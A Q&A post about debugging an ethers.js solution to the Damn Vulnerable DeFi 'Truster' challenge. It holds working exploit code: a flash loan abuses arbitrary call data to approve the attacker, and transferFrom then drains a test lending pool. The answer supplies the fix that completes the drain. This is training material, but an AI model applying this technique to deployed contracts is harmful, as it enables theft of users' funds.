# Ethersjs 'ERC20: transfer amount exceeds allowance' when calling transferFrom even though amount is approved

Tags: ethers.js, erc20

I'm currently trying to do the DamnVulnerableDefi-Challenge #3 (Truster). I decided to not code the solution in a contract, but directly in ethersjs to familiarise myself
with the library.

I however seem to run in to a really weird issue that I can not explain. As we can see in the console output, I clearly manage to set the proper `allowance` of the token from `TrusterLenderPool` to my address, however I'm unable to withdraw any of it, as the tx reverts, stating that transfer amount exceeds allowance (even if `amount`= 1).

What am I doing wrong? Any help appreciated!

Here the code of the TrusterLenderPool.sol: https://github.com/tinchoabbate/damn-vulnerable-defi/blob/v2.2.0/contracts/truster/TrusterLenderPool.sol

And here the code of the exploit including the tests that should pass:

```
const { ethers } = require('hardhat');
const { expect } = require('chai');

describe('[Challenge] Truster', function () {
    let deployer, attacker;

    const TOKENS_IN_POOL = ethers.utils.parseEther('1000000');

    before(async function () {
        /** SETUP SCENARIO - NO NEED TO CHANGE ANYTHING HERE */
        [deployer, attacker] = await ethers.getSigners();

        const DamnValuableToken = await ethers.getContractFactory('DamnValuableToken', deployer);
        const TrusterLenderPool = await ethers.getContractFactory('TrusterLenderPool', deployer);

        this.token = await DamnValuableToken.deploy();
        this.pool = await TrusterLenderPool.deploy(this.token.address);
        //this.poolAttack = await TrusterLenderPoolAttack.deploy();

        await this.token.transfer(this.pool.address, TOKENS_IN_POOL);

        expect(
            await this.token.balanceOf(this.pool.address)
        ).to.equal(TOKENS_IN_POOL);

        expect(
            await this.token.balanceOf(attacker.address)
        ).to.equal('0');
    });

    it('Exploit', async function () {
        /** CODE YOUR EXPLOIT HERE  */
        
        //Make a 0-amount flashloan, 
        //As target, specify the erc20-contract and approve a withdrawal of entire balance to my address
        //After flashloan, I can withdraw

        let ABI = ["function approve(address spender, uint256 amount)"];
        let iface = new ethers.utils.Interface(ABI);
        let data = iface.encodeFunctionData("approve", [attacker.address, await this.token.balanceOf(this.pool.address)]);

        await this.pool.connect(attacker);
        
        console.log("Allowance before: ", await this.token.allowance(this.pool.address, attacker.address))
        await this.pool.flashLoan(
            0,
            attacker.address,
            this.token.address,
            data
        );
        console.log("Allowance after: ", await this.token.allowance(this.pool.address, attacker.address));
        console.log("Contract balance", await this.token.balanceOf(this.pool.address))
        this.token.connect(attacker); //Make the call from attacker's address
        await this.token.transferFrom(this.pool.address, attacker.address, 1) //fails here
    });

    after(async function () {
        /** SUCCESS CONDITIONS */

        // Attacker has taken all tokens from the pool
        expect(
            await this.token.balanceOf(attacker.address)
        ).to.equal(TOKENS_IN_POOL);
        expect(
            await this.token.balanceOf(this.pool.address)
        ).to.equal('0');
    });
});
```

Here the console output, in which we can see that I'm able to set the allowance to the pool's balance, but can't do the transfer:

```
compiling 1 file with 0.8.7
Compilation finished successfully


  [Challenge] Truster
Allowance before:  BigNumber { _hex: '0x00', _isBigNumber: true }
Allowance after:  BigNumber { _hex: '0xd3c21bcecceda1000000', _isBigNumber: true }
Contract balance BigNumber { _hex: '0xd3c21bcecceda1000000', _isBigNumber: true }
    1) Exploit
    2) "after all" hook for "Exploit"


  0 passing (547ms)
  2 failing

  1) [Challenge] Truster
       Exploit:
     Error: VM Exception while processing transaction: reverted with reason string 'ERC20: transfer amount exceeds allowance'
      at DamnValuableToken.transferFrom (@openzeppelin/contracts/token/ERC20/ERC20.sol:157)
      at processTicksAndRejections (internal/process/task_queues.js:95:5)
      at runNextTicks (internal/process/task_queues.js:64:3)
      at listOnTimeout (internal/timers.js:526:9)
      at processTimers (internal/timers.js:500:7)
      at HardhatNode._mineBlockWithPendingTxs (node_modules/hardhat/src/internal/hardhat-network/provider/node.ts:1582:23)
      at HardhatNode.mineBlock (node_modules/hardhat/src/internal/hardhat-network/provider/node.ts:435:16)
      at EthModule._sendTransactionAndReturnHash (node_modules/hardhat/src/internal/hardhat-network/provider/modules/eth.ts:1494:18)

  2) [Challenge] Truster
       "after all" hook for "Exploit":

      AssertionError: Expected "0" to be equal 1000000000000000000000000
      + expected - actual

       {
      -  "_hex": "0xd3c21bcecceda1000000"
      +  "_hex": "0x00"
         "_isBigNumber": true
       }
      
      at Context.<anonymous> (test/truster/truster.challenge.js:66:14)
      at processTicksAndRejections (internal/process/task_queues.js:95:5)
      at runNextTicks (internal/process/task_queues.js:64:3)
      at listOnTimeout (internal/timers.js:526:9)
      at processTimers (internal/timers.js:500:7)
```

Answer (score 1):

In case you didn't solve it, the call to do the final transfer needed to come from the attacker:

```
await this.token.connect(attacker).transferFrom(this.pool.address,attacker.address,TOKENS_IN_POOL);
```